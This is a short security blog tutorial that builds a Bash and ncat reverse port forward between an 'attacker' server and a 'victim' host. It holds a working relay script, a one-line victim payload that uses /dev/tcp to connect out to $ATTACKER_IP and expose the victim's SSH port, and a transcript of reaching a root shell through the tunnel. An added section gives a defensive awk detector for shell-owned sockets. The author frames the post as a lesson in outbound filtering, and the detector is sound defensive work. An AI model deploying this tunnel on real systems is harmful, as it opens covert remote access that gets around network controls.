Etherarp

Networking, Security, Linux

Reverse Port Forwarding with Bash

Rohan Molloy

I had wondered for a while how SSH reverse port forwarding works, a feature that allows the client to publish a locally reachable destination upstream to the server.

This tutorial demonstrates how to implement that functionality using Bash and netcat. This allows remote access without having to open any external ports.

For this scenario, the upstream server is referred to as the 'attacker' and the downstream client is referred to as the 'victim'. Any service reachable from the 'victim' can be made reachable to the 'attacker'.

This type of tool demonstrates why restricting outbound network connectivity is important for hardening systems.

Attacker Server  

############################################
# Remote-Port-Forwarding Server (Attacker) #
############################################

### Listen for connections from victim
listen_external='0.0.0.0 8080'

### Local socket to access victim
listen_internal='127.0.0.1 2222'

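### Create a FIFO (named pipe) that carries data from the internal listener back to the external one
fifo=$(mktemp -u)
mkfifo "$fifo"

### Start the listeners (the address variables stay unquoted so they split into host and port)
ncat -l $listen_external 0<"$fifo" | ncat -l $listen_internal >"$fifo"

### Clean up
echo 'Lost connection!'
rm "$fifo"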

Victim Payload

echo "[$$] Publishing local port to server" \
&& exec 3<>/dev/tcp/$VICTIM_IP/$VICTIM_PORT \
&& exec 4<>/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT \
&& bash <(cat 0<&3 1>&4 & ) \
&& cat 0<&4 1>&3

Trying it out

root@attacker:/# ./bash-remote-port-forwarding-server.sh &
[1] 9357
root@attacker:/# ssh 127.0.0.1 -p 2222
root@victim:/#
[user@victim ~]$ echo "[$$] Publishing local port to server" \
> && exec 3<>/dev/tcp/127.0.0.1/22 \
> && exec 4<>/dev/tcp/10.3.141.59/8080 \
> && bash <(cat 0<&3 1>&4 & ) \
> && cat 0<&4 1>&3
[19156] Publishing local port to server
[user@victim ~]$
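
Detecting the payload on the downstream host (an added example, not part of the original post): the `exec 3<>/dev/tcp/...` redirections make the shell process itself own the TCP sockets, which shows up in `ss -tnp`. The function name `find_shell_sockets`, the variable `SAMPLE_SS` and every sample line are constructed for illustration; only `10.3.141.59:8080` and PID 19156 come from the transcript above.

```shell
#!/bin/sh
# Added example: flag shell processes that own established TCP sockets.
# Input is `ss -tnp` text (State Recv-Q Send-Q Local Peer Process).

# Constructed sample of `ss -tnpH` output (not captured from a real host).
SAMPLE_SS='ESTAB 0 0 127.0.0.1:40112 127.0.0.1:22 users:(("bash",pid=19156,fd=3))
ESTAB 0 0 10.3.141.20:51844 10.3.141.59:8080 users:(("bash",pid=19156,fd=4))
ESTAB 0 0 10.3.141.20:22 10.3.141.7:60222 users:(("sshd",pid=812,fd=4))
ESTAB 0 0 10.3.141.20:40500 192.0.2.10:443 users:(("curl",pid=2001,fd=5))
ESTAB 0 0 10.3.141.20:41000 192.0.2.44:4444 users:(("sh",pid=3050,fd=3))'

# Prints one line per shell PID: "PID KIND REMOTE_PEERS...".
# KIND is "relay" when the same shell holds both a loopback peer and a
# non-loopback peer (the shape of the payload above), otherwise "socket".
find_shell_sockets() {
    awk '
    $1 == "ESTAB" {
        rest = $0; peer = $5
        # A socket can be shared by several processes; check every owner.
        while (match(rest, /\("(bash|sh|dash|zsh|ksh)",pid=[0-9]+/)) {
            owner = substr(rest, RSTART, RLENGTH)
            rest = substr(rest, RSTART + RLENGTH)
            pid = owner; sub(/.*pid=/, "", pid)
            if (!(pid in seen)) { seen[pid] = 1; order[++n] = pid }
            if (peer ~ /^127\./ || peer ~ /^\[::1\]:/) lo[pid] = 1
            else remote[pid] = remote[pid] " " peer
        }
    }
    END {
        # Report in order of first appearance so output is stable.
        for (i = 1; i <= n; i++) {
            pid = order[i]
            kind = (lo[pid] && remote[pid] != "") ? "relay" : "socket"
            printf "%s %s%s\n", pid, kind, remote[pid]
        }
    }'
}

# Run against the constructed sample; on a live host: ss -tnpH | find_shell_sockets
printf '%s\n' "$SAMPLE_SS" | find_shell_sockets
```

Run `ss` as root so sockets owned by other users' processes are listed with their owners.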

References

https://www.frameloss.org/2013/12/14/wicked-cool-reverse-proxy-with-bash-and-netcat/
